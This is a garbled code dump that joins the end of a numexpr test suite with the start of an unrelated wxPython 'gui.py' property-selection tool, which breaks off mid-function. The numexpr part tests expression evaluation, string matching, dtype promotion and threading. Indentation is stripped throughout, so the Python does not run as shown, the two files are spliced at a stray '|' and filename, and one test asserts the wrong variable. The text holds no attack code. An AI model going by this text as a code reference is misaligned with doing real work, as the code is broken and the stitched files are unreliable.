assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x**2+2,axis=0)"), prod(x ** 2 + 2, axis=0))
# Check longs
x = x.astype(long)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x**2+2,axis=0)"), prod(x ** 2 + 2, axis=0))
# Check complex
x = x + .1j
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x-1,axis=0)"), prod(x - 1, axis=0))
def test_in_place(self):
x = arange(10000.).reshape(1000, 10)
evaluate("x + 3", out=x)
assert_equal(x, arange(10000.).reshape(1000, 10) + 3)
y = arange(10)
evaluate("(x - 3) * y + (x - 3)", out=x)
assert_equal(x, arange(10000.).reshape(1000, 10) * (arange(10) + 1))
def test_axis(self):
y = arange(9.0).reshape(3, 3)
try:
evaluate("sum(y, axis=2)")
except ValueError:
pass
else:
raise ValueError("should raise exception!")
try:
evaluate("sum(y, axis=-3)")
except ValueError:
pass
else:
raise ValueError("should raise exception!")
try:
# Negative axis are not supported
evaluate("sum(y, axis=-1)")
except ValueError:
pass
else:
raise ValueError("should raise exception!")
def test_r0_reuse(self):
assert_equal(disassemble(NumExpr("x * x + 2", [('x', double)])),
[(b'mul_ddd', b'r0', b'r1[x]', b'r1[x]'),
(b'add_ddd', b'r0', b'r0', b'c2[2.0]')])
def test_str_contains_basic0(self):
res = evaluate('contains(b"abc", b"ab")')
assert_equal(res, True)
def test_str_contains_basic1(self):
haystack = array([b'abc', b'def', b'xyz', b'x11', b'za'])
res = evaluate('contains(haystack, b"ab")')
assert_equal(res, [True, False, False, False, False])
def test_str_contains_basic2(self):
haystack = array([b'abc', b'def', b'xyz', b'x11', b'za'])
res = evaluate('contains(b"abcd", haystack)')
assert_equal(res, [True, False, False, False, False])
def test_str_contains_basic3(self):
haystacks = array(
[b'abckkk', b'adef', b'xyz', b'x11abcp', b'za', b'abc'])
needles = array(
[b'abc', b'def', b'aterr', b'oot', b'zu', b'ab'])
res = evaluate('contains(haystacks, needles)')
assert_equal(res, [True, True, False, False, False, True])
def test_str_contains_basic4(self):
needles = array(
[b'abc', b'def', b'aterr', b'oot', b'zu', b'ab c', b' abc',
b'abc '])
res = evaluate('contains(b"test abc here", needles)')
assert_equal(res, [True, False, False, False, False, False, True, True])
def test_str_contains_basic5(self):
needles = array(
[b'abc', b'ab c', b' abc', b' abc ', b'\tabc', b'c h'])
res = evaluate('contains(b"test abc here", needles)')
assert_equal(res, [True, False, True, True, False, True])
# Compare operation of Python 'in' operator with 'contains' using a
# product of two lists of strings.
def test_str_contains_listproduct(self):
from itertools import product
small = [
'It w', 'as th', 'e Whit', 'e Rab', 'bit,', ' tro', 'tting',
' sl', 'owly', ' back ', 'again,', ' and', ' lo', 'okin', 'g a',
'nxious', 'ly a', 'bou', 't a', 's it w', 'ent,', ' as i', 'f it',
' had l', 'ost', ' some', 'thi', 'ng; a', 'nd ', 'she ', 'heard ',
'it mut', 'terin', 'g to ', 'its', 'elf ', "'The",
' Duch', 'ess! T', 'he ', 'Duches', 's! Oh ', 'my dea', 'r paws',
'! Oh ', 'my f', 'ur ', 'and ', 'whiske', 'rs! ', 'She', "'ll g",
'et me', ' ex', 'ecu', 'ted, ', 'as su', 're a', 's f', 'errets',
' are f', 'errets', '! Wh', 'ere ', 'CAN', ' I hav', 'e d',
'roppe', 'd t', 'hem,', ' I wo', 'nder?', "' A", 'lice',
' gu', 'essed', ' in a', ' mom', 'ent ', 'tha', 't it w', 'as ',
'looki', 'ng f', 'or ', 'the fa', 'n and ', 'the', ' pai',
'r of w', 'hit', 'e kid', ' glo', 'ves', ', and ', 'she ',
'very g', 'ood', '-na', 'turedl', 'y be', 'gan h', 'unt', 'ing',
' about', ' for t', 'hem', ', but', ' they ', 'wer', 'e nowh',
'ere to', ' be', ' se', 'en--', 'ever', 'ythin', 'g seem', 'ed ',
'to ', 'have c', 'hang', 'ed ', 'since', ' he', 'r swim', ' in',
' the', ' pool,', ' and', ' the g', 'reat ', 'hal', 'l, w', 'ith',
' th', 'e gl', 'ass t', 'abl', 'e and ', 'the', ' li', 'ttle',
' doo', 'r, ha', 'd v', 'ani', 'shed c', 'omp', 'lete', 'ly.']
big = [
'It wa', 's the', ' W', 'hit', 'e ', 'Ra', 'bb', 'it, t', 'ro',
'tting s', 'lowly', ' back ', 'agai', 'n, and', ' l', 'ookin',
'g ', 'an', 'xiously', ' about ', 'as it w', 'ent, as', ' if ',
'it had', ' los', 't ', 'so', 'mething', '; and', ' she h',
'eard ', 'it ', 'mutteri', 'ng to', ' itself', " 'The ",
'Duchess', '! ', 'Th', 'e ', 'Duchess', '! Oh m', 'y de',
'ar paws', '! ', 'Oh my ', 'fu', 'r and w', 'hiskers', "! She'",
'll ', 'get', ' me ', 'execute', 'd,', ' a', 's ', 'su', 're as ',
'fe', 'rrets', ' are f', 'errets!', ' Wher', 'e CAN', ' I ha',
've dro', 'pped t', 'hem', ', I ', 'won', "der?' A",
'lice g', 'uess', 'ed ', 'in a m', 'omen', 't that', ' i',
't was l', 'ook', 'ing f', 'or th', 'e ', 'fan and', ' th', 'e p',
'air o', 'f whit', 'e ki', 'd glove', 's, and ', 'she v', 'ery ',
'good-na', 'tu', 'redl', 'y be', 'gan hun', 'ti', 'ng abou',
't for t', 'he', 'm, bu', 't t', 'hey ', 'were n', 'owhere',
' to b', 'e s', 'een-', '-eve', 'rythi', 'ng see', 'me', 'd ',
'to ha', 've', ' c', 'hanged', ' sinc', 'e her s', 'wim ',
'in the ', 'pool,', ' an', 'd the g', 'rea', 't h', 'all, wi',
'th the ', 'glas', 's t', 'able an', 'd th', 'e littl', 'e door,',
' had va', 'ni', 'shed co', 'mpletel', 'y.']
p = list(product(small, big))
python_in = [x[0] in x[1] for x in p]
a = [x[0].encode() for x in p]
b = [x[1].encode() for x in p]
res = [bool(x) for x in evaluate('contains(b, a)')]
assert_equal(res, python_in)
def test_str_contains_withemptystr1(self):
withemptystr = array([b'abc', b'def', b''])
res = evaluate('contains(b"abcd", withemptystr)')
assert_equal(res, [True, False, True])
def test_str_contains_withemptystr2(self):
withemptystr = array([b'abc', b'def', b''])
res = evaluate('contains(withemptystr, b"")')
assert_equal(res, [True, True, True])
class test_numexpr2(test_numexpr):
"""Testing with 2 threads"""
nthreads = 2
class test_evaluate(TestCase):
def test_simple(self):
a = array([1., 2., 3.])
b = array([4., 5., 6.])
c = array([7., 8., 9.])
x = evaluate("2*a + 3*b*c")
assert_array_equal(x, array([86., 124., 168.]))
def test_simple_expr_small_array(self):
x = arange(100.0)
y = evaluate("x")
assert_array_equal(x, y)
def test_simple_expr(self):
x = arange(1e6)
y = evaluate("x")
assert_array_equal(x, y)
# Test for issue #37
if sys.version_info[0] < 3:
# In python 3 '/' perforns true division, not integer division.
# Integer division '//' is still not suppoerted by numexpr
def test_zero_div(self):
x = arange(100, dtype='i4')
y = evaluate("1/x")
x2 = zeros(100, dtype='i4')
x2[1] = 1
assert_array_equal(x2, y)
# Test for issue #22
def test_true_div(self):
x = arange(10, dtype='i4')
assert_array_equal(evaluate("x/2"), x / 2)
assert_array_equal(evaluate("x/2", truediv=False), x / 2)
assert_array_equal(evaluate("x/2", truediv='auto'), x / 2)
assert_array_equal(evaluate("x/2", truediv=True), x / 2.0)
def test_left_shift(self):
x = arange(10, dtype='i4')
assert_array_equal(evaluate("x<<2"), x << 2)
def test_right_shift(self):
x = arange(10, dtype='i4')
assert_array_equal(evaluate("x>>2"), x >> 2)
# PyTables uses __nonzero__ among ExpressionNode objects internally
# so this should be commented out for the moment. See #24.
def test_boolean_operator(self):
x = arange(10, dtype='i4')
try:
evaluate("(x > 1) and (x < 9)")
except TypeError:
pass
else:
raise ValueError("should raise exception!")
def test_rational_expr(self):
a = arange(1e6)
b = arange(1e6) * 0.1
x = (a + 2 * b) / (1 + a + 4 * b * b)
y = evaluate("(a + 2*b) / (1 + a + 4*b*b)")
assert_array_almost_equal(x, y)
def test_complex64_expr(self):
def complex64_func(a, b):
c = zeros(a.shape, dtype=complex64)
c.real = a
c.imag = b
return c
a = arange(1e4, dtype='float32' )
b = (arange(1e4) ** 1e-5).astype('float32')
z = ( a + 1j * b ).astype( 'complex64' ) # RAM this is complex128 by default numpy rules
x = z.imag
x = sin(complex64_func(a,b)).real + z.imag
# RAM: this check cannot pass because we don't have a function to do this
# complex64(a,b) in the function list
y = evaluate("sin(complex64(a, b)).real + z.imag")
assert_array_almost_equal(x, y)
def test_complex_expr(self):
def complex(a, b):
c = zeros(a.shape, dtype=complex_)
c.real = a
c.imag = b
return c
a = arange(1e4)
b = arange(1e4) ** 1e-5
z = a + 1j * b
x = z.imag
x = sin(complex(a, b)).real + z.imag
y = evaluate("sin(complex(a, b)).real + z.imag")
assert_array_almost_equal(x, y)
def test_complex_strides(self):
a = arange(100).reshape(10, 10)[::2]
b = arange(50).reshape(5, 10)
assert_array_equal(evaluate("a+b"), a + b)
c = empty([10], dtype=[('c1', int32), ('c2', uint16)])
c['c1'] = arange(10)
c['c2'].fill(0xaaaa)
c1 = c['c1']
a0 = a[0]
assert_array_equal(evaluate("c1"), c1)
assert_array_equal(evaluate("a0+c1"), a0 + c1)
def test_broadcasting(self):
a = arange(100).reshape(10, 10)[::2]
c = arange(10)
d = arange(5).reshape(5, 1)
assert_array_equal(evaluate("a+c"), a + c)
assert_array_equal(evaluate("a+d"), a + d)
expr = NumExpr("2.0*a+3.0*c", [('a', double), ('c', double)])
assert_array_equal(expr(a, c), 2.0 * a + 3.0 * c)
def test_all_scalar(self):
a = 3.
b = 4.
assert_allclose(evaluate("a+b"), a + b)
expr = NumExpr("2*a+3*b", [('a', double), ('b', double)])
assert_equal(expr(a, b), 2 * a + 3 * b)
def test_run(self):
a = arange(100).reshape(10, 10)[::2]
b = arange(10)
expr = NumExpr("2*a+3*b", [('a', double), ('b', double)])
assert_array_equal(expr(a, b), expr.run(a, b))
def test_illegal_value(self):
a = arange(3)
try:
evaluate("a < [0, 0, 0]")
except TypeError:
pass
else:
self.fail()
if 'sparc' not in platform.machine():
# Execution order set here so as to not use too many threads
# during the rest of the execution. See #33 for details.
def test_changing_nthreads_00_inc(self):
a = linspace(-1, 1, 1e6)
b = ((.25 * a + .75) * a - 1.5) * a - 2
for nthreads in range(1, 7):
numexpr.set_num_threads(nthreads)
c = evaluate("((.25*a + .75)*a - 1.5)*a - 2")
assert_array_almost_equal(b, c)
def test_changing_nthreads_01_dec(self):
a = linspace(-1, 1, 1e6)
b = ((.25 * a + .75) * a - 1.5) * a - 2
for nthreads in range(6, 1, -1):
numexpr.set_num_threads(nthreads)
c = evaluate("((.25*a + .75)*a - 1.5)*a - 2")
assert_array_almost_equal(b, c)
tests = [
('MISC', ['b*c+d*e',
'2*a+3*b',
'-a',
'sinh(a)',
'2*a + (cos(3)+5)*sinh(cos(b))',
'2*a + arctan2(a, b)',
'arcsin(0.5)',
'where(a != 0.0, 2, a)',
'where(a > 10, b < a, b > a)',
'where((a-10).real != 0.0, a, 2)',
'0.25 * (a < 5) + 0.33 * (a >= 5)',
'cos(1+1)',
'1+1',
'1',
'cos(a2)',
])]
optests = []
for op in list('+-*/%') + ['**']:
optests.append("(a+1) %s (b+3)" % op)
optests.append("3 %s (b+3)" % op)
optests.append("(a+1) %s 4" % op)
optests.append("2 %s (b+3)" % op)
optests.append("(a+1) %s 2" % op)
optests.append("(a+1) %s -1" % op)
optests.append("(a+1) %s 0.5" % op)
# Check divisions and modulus by zero (see ticket #107)
optests.append("(a+1) %s 0" % op)
tests.append(('OPERATIONS', optests))
cmptests = []
for op in ['<', '<=', '==', '>=', '>', '!=']:
cmptests.append("a/2+5 %s b" % op)
cmptests.append("a/2+5 %s 7" % op)
cmptests.append("7 %s b" % op)
cmptests.append("7.0 %s 5" % op)
tests.append(('COMPARISONS', cmptests))
func1tests = []
for func in ['copy', 'ones_like', 'sqrt',
'sin', 'cos', 'tan', 'arcsin', 'arccos', 'arctan',
'sinh', 'cosh', 'tanh', 'arcsinh', 'arccosh', 'arctanh',
'log', 'log1p', 'log10', 'exp', 'expm1', 'abs', 'conj']:
func1tests.append("a + %s(b+c)" % func)
tests.append(('1_ARG_FUNCS', func1tests))
func2tests = []
for func in ['arctan2', 'fmod']:
func2tests.append("a + %s(b+c, d+1)" % func)
func2tests.append("a + %s(b+c, 1)" % func)
func2tests.append("a + %s(1, d+1)" % func)
tests.append(('2_ARG_FUNCS', func2tests))
powtests = []
# n = -1, 0.5, 2, 4 already handled in section "OPERATIONS"
for n in (-7, -2.5, -1.5, -1.3, -.5, 0, 0.0, 1, 2.3, 2.5, 3):
powtests.append("(a+1)**%s" % n)
tests.append(('POW_TESTS', powtests))
def equal(a, b, exact):
if array_equal(a, b):
return True
if hasattr(a, 'dtype') and a.dtype in ['f4', 'f8']:
nnans = isnan(a).sum()
if nnans > 0:
# For results containing NaNs, just check that the number
# of NaNs is the same in both arrays. This check could be
# made more exhaustive, but checking element by element in
# python space is very expensive in general.
return nnans == isnan(b).sum()
ninfs = isinf(a).sum()
if ninfs > 0:
# Ditto for Inf's
return ninfs == isinf(b).sum()
if exact:
return (shape(a) == shape(b)) and alltrue(ravel(a) == ravel(b), axis=0)
else:
if hasattr(a, 'dtype') and a.dtype == 'f4':
atol = 1e-5 # Relax precission for special opcodes, like fmod
else:
atol = 1e-8
return (shape(a) == shape(b) and
allclose(ravel(a), ravel(b), atol=atol))
class Skip(Exception): pass
def test_expressions():
test_no = [0]
def make_test_method(a, a2, b, c, d, e, x, expr,
test_scalar, dtype, optimization, exact, section):
this_locals = locals()
def method():
# We don't want to listen at RuntimeWarnings like
# "overflows" or "divide by zero" in plain eval().
warnings.simplefilter("ignore")
npval = eval(expr, globals(), this_locals)
warnings.simplefilter("always")
npval = eval(expr, globals(), this_locals)
try:
neval = evaluate(expr, local_dict=this_locals,
optimization=optimization)
assert equal(npval, neval, exact), """%r
(test_scalar=%r, dtype=%r, optimization=%r, exact=%r,
npval=%r (%r - %r)\n neval=%r (%r - %r))""" % (expr, test_scalar, dtype.__name__,
optimization, exact,
npval, type(npval), shape(npval),
neval, type(neval), shape(neval))
except AssertionError:
raise
except NotImplementedError:
print('%r not implemented for %s (scalar=%d, opt=%s)'
% (expr, dtype.__name__, test_scalar, optimization))
except:
print('numexpr error for expression %r' % (expr,))
raise
method.description = ('test_expressions(%s, test_scalar=%r, '
'dtype=%r, optimization=%r, exact=%r)') \
% (expr, test_scalar, dtype.__name__, optimization, exact)
test_no[0] += 1
method.__name__ = 'test_scalar%d_%s_%s_%s_%04d' % (test_scalar,
dtype.__name__,
optimization.encode('ascii'),
section.encode('ascii'),
test_no[0])
return method
x = None
for test_scalar in (0, 1, 2):
for dtype in (int, long, np.float32, double, complex):
array_size = 100
a = arange(2 * array_size, dtype=dtype)[::2]
a2 = zeros([array_size, array_size], dtype=dtype)
b = arange(array_size, dtype=dtype) / array_size
c = arange(array_size, dtype=dtype)
d = arange(array_size, dtype=dtype)
e = arange(array_size, dtype=dtype)
if dtype == complex:
a = a.real
for x in [a2, b, c, d, e]:
x += 1j
x *= 1 + 1j
if test_scalar == 1:
a = a[array_size // 2]
if test_scalar == 2:
b = b[array_size // 2]
for optimization, exact in [
('none', False), ('moderate', False), ('aggressive', False)]:
for section_name, section_tests in tests:
for expr in section_tests:
if (dtype == complex and
('<' in expr or '>' in expr or '%' in expr
or "arctan2" in expr or "fmod" in expr)):
# skip complex comparisons or functions not
# defined in complex domain.
continue
if (dtype in (int, long) and test_scalar and
expr == '(a+1) ** -1'):
continue
m = make_test_method(a, a2, b, c, d, e, x,
expr, test_scalar, dtype,
optimization, exact,
section_name)
yield m
class test_int64(TestCase):
def test_neg(self):
a = array([2 ** 31 - 1, 2 ** 31, 2 ** 32, 2 ** 63 - 1], dtype=int64)
res = evaluate('-a')
assert_array_equal(res, [1 - 2 ** 31, -(2 ** 31), -(2 ** 32), 1 - 2 ** 63])
self.assertEqual(res.dtype.name, 'int64')
class test_int32_int64(TestCase):
if sys.version_info[0] < 2:
# no long literals in python 3
def test_small_long(self):
# Small longs should not be downgraded to ints.
res = evaluate('42L')
assert_array_equal(res, 42)
self.assertEqual(res.dtype.name, 'int64')
def test_small_int(self):
# Small ints (32-bit ones) should not be promoted to longs.
res = evaluate('2')
assert_array_equal(res, 2)
self.assertEqual(res.dtype.name, 'int32')
def test_big_int(self):
# Big ints should be promoted to longs.
res = evaluate('2**40')
assert_array_equal(res, 2 ** 40)
self.assertEqual(res.dtype.name, 'int64')
def test_long_constant_promotion(self):
int32array = arange(100, dtype='int32')
itwo = np.int32(2)
ltwo = np.int64(2)
res = int32array * 2
res32 = evaluate('int32array * itwo')
res64 = evaluate('int32array * ltwo')
assert_array_equal(res, res32)
assert_array_equal(res, res64)
self.assertEqual(res32.dtype.name, 'int32')
self.assertEqual(res64.dtype.name, 'int64')
def test_int64_array_promotion(self):
int32array = arange(100, dtype='int32')
int64array = arange(100, dtype='int64')
respy = int32array * int64array
resnx = evaluate('int32array * int64array')
assert_array_equal(respy, resnx)
self.assertEqual(resnx.dtype.name, 'int64')
class test_uint32_int64(TestCase):
def test_small_uint32(self):
# Small uint32 should not be downgraded to ints.
a = np.uint32(42)
res = evaluate('a')
assert_array_equal(res, 42)
self.assertEqual(res.dtype.name, 'int64')
def test_uint32_constant_promotion(self):
int32array = arange(100, dtype='int32')
stwo = np.int32(2)
utwo = np.uint32(2)
res = int32array * utwo
res32 = evaluate('int32array * stwo')
res64 = evaluate('int32array * utwo')
assert_array_equal(res, res32)
assert_array_equal(res, res64)
self.assertEqual(res32.dtype.name, 'int32')
self.assertEqual(res64.dtype.name, 'int64')
def test_int64_array_promotion(self):
uint32array = arange(100, dtype='uint32')
int64array = arange(100, dtype='int64')
respy = uint32array * int64array
resnx = evaluate('uint32array * int64array')
assert_array_equal(respy, resnx)
self.assertEqual(resnx.dtype.name, 'int64')
class test_strings(TestCase):
BLOCK_SIZE1 = 128
BLOCK_SIZE2 = 8
str_list1 = [b'foo', b'bar', b'', b' ']
str_list2 = [b'foo', b'', b'x', b' ']
str_nloops = len(str_list1) * (BLOCK_SIZE1 + BLOCK_SIZE2 + 1)
str_array1 = array(str_list1 * str_nloops)
str_array2 = array(str_list2 * str_nloops)
str_constant = b'doodoo'
def test_null_chars(self):
str_list = [
b'\0\0\0', b'\0\0foo\0', b'\0\0foo\0b', b'\0\0foo\0b\0',
b'foo\0', b'foo\0b', b'foo\0b\0', b'foo\0bar\0baz\0\0']
for s in str_list:
r = evaluate('s')
self.assertEqual(s, r.tostring()) # check *all* stored data
def test_compare_copy(self):
sarr = self.str_array1
expr = 'sarr'
res1 = eval(expr)
res2 = evaluate(expr)
assert_array_equal(res1, res2)
def test_compare_array(self):
sarr1 = self.str_array1
sarr2 = self.str_array2
expr = 'sarr1 >= sarr2'
res1 = eval(expr)
res2 = evaluate(expr)
assert_array_equal(res1, res2)
def test_compare_variable(self):
sarr = self.str_array1
svar = self.str_constant
expr = 'sarr >= svar'
res1 = eval(expr)
res2 = evaluate(expr)
assert_array_equal(res1, res2)
def test_compare_constant(self):
sarr = self.str_array1
expr = 'sarr >= %r' % self.str_constant
res1 = eval(expr)
res2 = evaluate(expr)
assert_array_equal(res1, res2)
def test_add_string_array(self):
sarr1 = self.str_array1
sarr2 = self.str_array2
expr = 'sarr1 + sarr2'
self.assert_missing_op('add_sss', expr, locals())
def test_empty_string1(self):
a = np.array(["", "pepe"])
b = np.array(["pepe2", ""])
res = evaluate("(a == '') & (b == 'pepe2')")
assert_array_equal(res, np.array([True, False]))
res2 = evaluate("(a == 'pepe') & (b == '')")
assert_array_equal(res2, np.array([False, True]))
def test_empty_string2(self):
a = np.array(["p", "pepe"])
b = np.array(["pepe2", ""])
res = evaluate("(a == '') & (b == 'pepe2')")
assert_array_equal(res, np.array([False, False]))
res2 = evaluate("(a == 'pepe') & (b == '')")
assert_array_equal(res, np.array([False, False]))
def test_add_numeric_array(self):
sarr = self.str_array1
narr = arange(len(sarr), dtype='int32')
expr = 'sarr >= narr'
self.assert_missing_op('ge_bsi', expr, locals())
def assert_missing_op(self, op, expr, local_dict):
msg = "expected NotImplementedError regarding '%s'" % op
try:
evaluate(expr, local_dict)
except NotImplementedError, nie:
if "'%s'" % op not in nie.args[0]:
self.fail(msg)
else:
self.fail(msg)
def test_compare_prefix(self):
# Check comparing two strings where one is a prefix of the
# other.
for s1, s2 in [(b'foo', b'foobar'), (b'foo', b'foo\0bar'),
(b'foo\0a', b'foo\0bar')]:
self.assertTrue(evaluate('s1 < s2'))
self.assertTrue(evaluate('s1 <= s2'))
self.assertTrue(evaluate('~(s1 == s2)'))
self.assertTrue(evaluate('~(s1 >= s2)'))
self.assertTrue(evaluate('~(s1 > s2)'))
# Check for NumPy array-style semantics in string equality.
s1, s2 = b'foo', b'foo\0\0'
self.assertTrue(evaluate('s1 == s2'))
# Case for testing selections in fields which are aligned but whose
# data length is not an exact multiple of the length of the record.
# The following test exposes the problem only in 32-bit machines,
# because in 64-bit machines 'c2' is unaligned. However, this should
# check most platforms where, while not unaligned, 'len(datatype) >
# boundary_alignment' is fullfilled.
class test_irregular_stride(TestCase):
def test_select(self):
f0 = arange(10, dtype=int32)
f1 = arange(10, dtype=float64)
irregular = rec.fromarrays([f0, f1])
f0 = irregular['f0']
f1 = irregular['f1']
i0 = evaluate('f0 < 5')
i1 = evaluate('f1 < 5')
assert_array_equal(f0[i0], arange(5, dtype=int32))
assert_array_equal(f1[i1], arange(5, dtype=float64))
# Cases for testing arrays with dimensions that can be zero.
class test_zerodim(TestCase):
def test_zerodim1d(self):
a0 = array([], dtype=int32)
a1 = array([], dtype=float64)
r0 = evaluate('a0 + a1')
r1 = evaluate('a0 * a1')
assert_array_equal(r0, a1)
assert_array_equal(r1, a1)
def test_zerodim3d(self):
a0 = array([], dtype=int32).reshape(0, 2, 4)
a1 = array([], dtype=float64).reshape(0, 2, 4)
r0 = evaluate('a0 + a1')
r1 = evaluate('a0 * a1')
assert_array_equal(r0, a1)
assert_array_equal(r1, a1)
@contextmanager
def _environment(key, value):
old = os.environ.get(key)
os.environ[key] = value
try:
yield
finally:
if old:
os.environ[key] = old
else:
del os.environ[key]
# Test cases for the threading configuration
class test_threading_config(TestCase):
def test_numexpr_num_threads(self):
with _environment('OMP_NUM_THREADS', '5'):
with _environment('NUMEXPR_NUM_THREADS', '3'):
self.assertEquals(3, numexpr.detect_number_of_threads())
def test_omp_num_threads(self):
with _environment('OMP_NUM_THREADS', '5'):
self.assertEquals(5, numexpr.detect_number_of_threads())
# Case test for threads
class test_threading(TestCase):
def test_thread(self):
import threading
class ThreadTest(threading.Thread):
def run(self):
a = arange(3)
assert_array_equal(evaluate('a**3'), array([0, 1, 8]))
test = ThreadTest()
test.start()
# The worker function for the subprocess (needs to be here because Windows
# has problems pickling nested functions with the multiprocess module :-/)
def _worker(qout=None):
ra = np.arange(1e3)
rows = evaluate('ra > 0')
#print "Succeeded in evaluation!\n"
if qout is not None:
qout.put("Done")
# Case test for subprocesses (via multiprocessing module)
class test_subprocess(TestCase):
def test_multiprocess(self):
try:
import multiprocessing as mp
except ImportError:
return
# Check for two threads at least
numexpr.set_num_threads(2)
#print "**** Running from main process:"
_worker()
#print "**** Running from subprocess:"
qout = mp.Queue()
ps = mp.Process(target=_worker, args=(qout,))
ps.daemon = True
ps.start()
result = qout.get()
#print result
def print_versions():
"""Print the versions of software that numexpr relies on."""
from pkg_resources import parse_version
if parse_version(np.__version__) < parse_version(minimum_numpy_version):
print("*Warning*: NumPy version is lower than recommended: %s < %s" % \
(np.__version__, minimum_numpy_version))
print('-=' * 38)
print("Numexpr version: %s" % numexpr.__version__)
print("NumPy version: %s" % np.__version__)
print('Python version: %s' % sys.version)
if os.name == 'posix':
(sysname, nodename, release, version, machine) = os.uname()
print('Platform: %s-%s' % (sys.platform, machine))
print("AMD/Intel CPU? %s" % numexpr.is_cpu_amd_intel)
print("VML available? %s" % use_vml)
if use_vml:
print("VML/MKL version: %s" % numexpr.get_vml_version())
print("Number of threads used by default: %d "
"(out of %d detected cores)" % (numexpr.nthreads, numexpr.ncores))
print('-=' * 38)
def test():
"""
Run all the tests in the test suite.
"""
print_versions()
return unittest.TextTestRunner().run(suite())
test.__test__ = False
def suite():
import unittest
import platform as pl
theSuite = unittest.TestSuite()
niter = 1
class TestExpressions(TestCase):
pass
def add_method(func):
def method(self):
return func()
setattr(TestExpressions, func.__name__,
method.__get__(None, TestExpressions))
for func in test_expressions():
add_method(func)
for n in range(niter):
theSuite.addTest(unittest.makeSuite(test_numexpr))
if 'sparc' not in platform.machine():
theSuite.addTest(unittest.makeSuite(test_numexpr2))
theSuite.addTest(unittest.makeSuite(test_evaluate))
theSuite.addTest(unittest.makeSuite(TestExpressions))
theSuite.addTest(unittest.makeSuite(test_int32_int64))
theSuite.addTest(unittest.makeSuite(test_uint32_int64))
theSuite.addTest(unittest.makeSuite(test_strings))
theSuite.addTest(
unittest.makeSuite(test_irregular_stride))
theSuite.addTest(unittest.makeSuite(test_zerodim))
theSuite.addTest(unittest.makeSuite(test_threading_config))
# multiprocessing module is not supported on Hurd/kFreeBSD
if (pl.system().lower() not in ('gnu', 'gnu/kfreebsd')):
theSuite.addTest(unittest.makeSuite(test_subprocess))
# I need to put this test after test_subprocess because
# if not, the test suite locks immediately before test_subproces.
# This only happens with Windows, so I suspect of a subtle bad
# interaction with threads and subprocess :-/
theSuite.addTest(unittest.makeSuite(test_threading))
return theSuite
if __name__ == '__main__':
print_versions()
unittest.main(defaultTest='suite')
# suite = suite()
# unittest.TextTestRunner(verbosity=2).run(suite)
|
gui.py | import util, wx, time, threading, pprint, os, urllib
from util import get_api_client, get_input_args, print_err, pprint_err
from subprocess import Popen, PIPE
goatc_buttons = []
property_dialog = None
listbox_groupid = None
label_groupid = None
label_populatedgroupid = None
listbox_populatedgroupid_locked = False
listbox_propertyid = None
label_populatedpropertyid = None
listbox_populatedpropertyid_locked = False
class SelectPropertyDialog(wx.Dialog):
def go(self, flag):
if (flag == False):
self.Close()
else:
wx.MessageBox("Wait for the current operation to complete before continuing.")
def __init__(self):
wx.Dialog.__init__(self, None, title="Select Other Property",style=(~wx.CLOSE_BOX))
self.SetSize(size=(400,400))
other_hidden_label = wx.StaticText(self, label="", pos=(0, 0))
other_hidden_label.Hide()
groupbtn = wx.Button(self, label="Get Group IDs", pos=(275,10))
groupbtn.Bind(wx.EVT_BUTTON, populate_group_id_nonblocking)
global txtctrl_switchkey
label_currentkey = wx.StaticText(self, label="Current Switch Key: " + txtctrl_switchkey.GetValue(), pos=(10, 10))
global label_populatedgroupid
label_populatedgroupid = wx.StaticText(self, label="", pos=(10, 16))
global listbox_populatedgroupid_locked
label_getproperties = wx.StaticText(self, label="Property ID List:", pos=(10, 185))
global label_populatedpropertyid
label_populatedpropertyid = wx.StaticText(self, label="...", pos=(10, 190))
global listbox_populatedpropertyid_locked
propertybtn = wx.Button(self, label="Get Property IDs", pos=(265,185))
global listbox_propertyid
listbox_propertyid = wx.ListBox(self, pos=(10, 205), size=(375,150))
propertybtn.Bind(wx.EVT_BUTTON, populate_property_id_nonblocking)
gobtn = wx.Button(self, label="Go!", pos=(300,355))
gobtn.Bind(wx.EVT_BUTTON, lambda event: self.go(listbox_populatedgroupid_locked))
global property_dialog
property_dialog = self
global listbox_groupid
listbox_groupid = wx.ListBox(self, pos=(10, 31), size=(375,150))
window.Bind(wx.EVT_TIMER, lambda evt, temp=other_hidden_label: update_continuously(evt, temp))
def select_other_property(e):
global txtctrl_switchkey
if (txtctrl_switchkey.GetValue() == ""):
wx.MessageBox("You must enter a switch key to select a property.")
else:
dlg = SelectPropertyDialog()
dlg.ShowModal()
window.Unbind(wx.EVT_TIMER)
dlg.Destroy()
return False
def reset_form(e):
global button_test_pragmas
button_test_pragmas.SetValue(False)
for button in goatc_buttons:
button.reset()
class GoatcButton(wx.Button):
toggled = False
default_label = ""
default_prefix = ""
def reset(self):
self.SetLabel(self.default_label)
self.toggled = False
self.SetOwnForegroundColour(wx.BLACK)
def toggle_binary_test_condition(self,e):
if (self.toggled):
self.reset()
else:
self.SetLabel(self.default_prefix)
self.SetOwnForegroundColour(wx.GREEN)
self.toggled = True
def toggle_integral_test_condition(self,e):
if (self.toggled):
self.toggled = False
self.SetLabel(self.default_label)
self.SetOwnForegroundColour(wx.BLACK)
else:
dialog = wx.TextEntryDialog(self, "Enter integer value",
"Test Condition", "", wx.OK | wx.CANCEL)
if dialog.ShowModal() == wx.ID_OK:
try:
number = int(dialog.GetValue())
self.SetOwnForegroundColour(wx.GREEN)
self.toggled = True
self.SetLabel(self.default_prefix+"=" + dialog.GetValue())
except:
wx.MessageBox("Invalid value, only integers allowed.", "Error")
dialog.Destroy()
def toggle_int_comma_string_condition(self,e):
if (self.toggled):
self.toggled = False
self.SetLabel(self.default_label)
self.SetOwnForegroundColour(wx.BLACK)
else:
dialog = wx.TextEntryDialog(self, "Enter INT,STRING (an integer, followed by a comma, and then thext)",
"Test Condition", "", wx.OK | wx.CANCEL)
if dialog.ShowModal() == wx.ID_OK:
try:
str = dialog.GetValue()
contents = str.split(",")
number = int(contents[0])
text = contents[1]
self.SetOwnForegroundColour(wx.GREEN)
self.toggled = True
self.SetLabel(self.default_prefix+"=" + contents[0] + "," + text)
except:
wx.MessageBox("Invalid value, only integers allowed.", "Error")
dialog.Destroy()
def toggle_integral_y_or_n_condition(self,e):
if (self.toggled):
self.toggled = False
self.SetLabel(self.default_label)
self.SetOwnForegroundColour(wx.BLACK)
else:
